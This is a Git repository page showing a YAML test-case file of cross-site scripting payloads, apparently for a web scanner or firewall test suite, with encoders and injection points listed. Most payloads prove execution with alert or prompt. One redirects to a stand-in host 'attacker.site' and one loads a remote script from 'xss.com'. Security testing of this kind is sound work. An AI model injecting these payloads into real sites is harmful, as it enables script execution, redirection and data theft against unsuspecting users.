customer-engineering/gitex2026
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
gitex2026/AttackSurface/dist/testcases/owasp/xss-scripting.yml
administrator 3915fa975f chore: auto-commit 2026-04-24 19:18
2026-04-24 19:18:37 +00:00

38 lines
1.3 KiB
YAML
Raw Blame History

payload:
- <body onload=alert('test1')>
- <IMG SRC=j&#X41vascript:alert('test')>
- '"onwheel=ead(111)'
- __proto__[v-if]=_c.constructor('alert(1)')()
- sometext<svg onload=alert(document.domain)>?mimeType=text/html
- '"));if(!self.x)self.x=!alert(document.domain)}catch(e){}//'
- <img src=x onerror=alert(document.domain)>/all
- confirm.call(null,1)
- javascript:setInterval('ale'+'rt(document.domain)')
- javascript:setInterval('fet'+'ch(document.domain)')
- javascript:setInterval('con'+'firm(document.domain)')
- javascript:setInterval('prom'+'pt(document.domain)')
- alert.call(%20, "XSS");
- (alert)(1)
- <svg/onload=alert(=RND=)//
- '"onClick="(prompt)(1)'
- "'>alert(1)</script><script/1='"
- '"//Onx=""//onfocus=prompt(1)>'
- '"Onx=() onMouSeoVer=prompt(1)>'
- '"OnCliCk="(prompt`1`)'
- prompt.call(null,1)
- alert.apply(null, [1])
- '&lt;svg/onload&equals;alert(1)&gt;'
- \"autof<x>ocus o<x>nfocus=alert<x>(1)//
- '"><p only=1337 onmouseenter=window.location.href=//attacker.site>'
- '"><svg onmouseover="confirm&#0000000040document.domain)'
- "<<scr\0ipt/src=http://xss.com/xss.js></script"
- "\'-alert(1)//"
encoder:
- Base64Flat
- URL
placeholder:
- URLPath
- URLParam
- HTMLForm
- HTMLMultipartForm
type: XSS
Reference in a new issue View git blame Copy permalink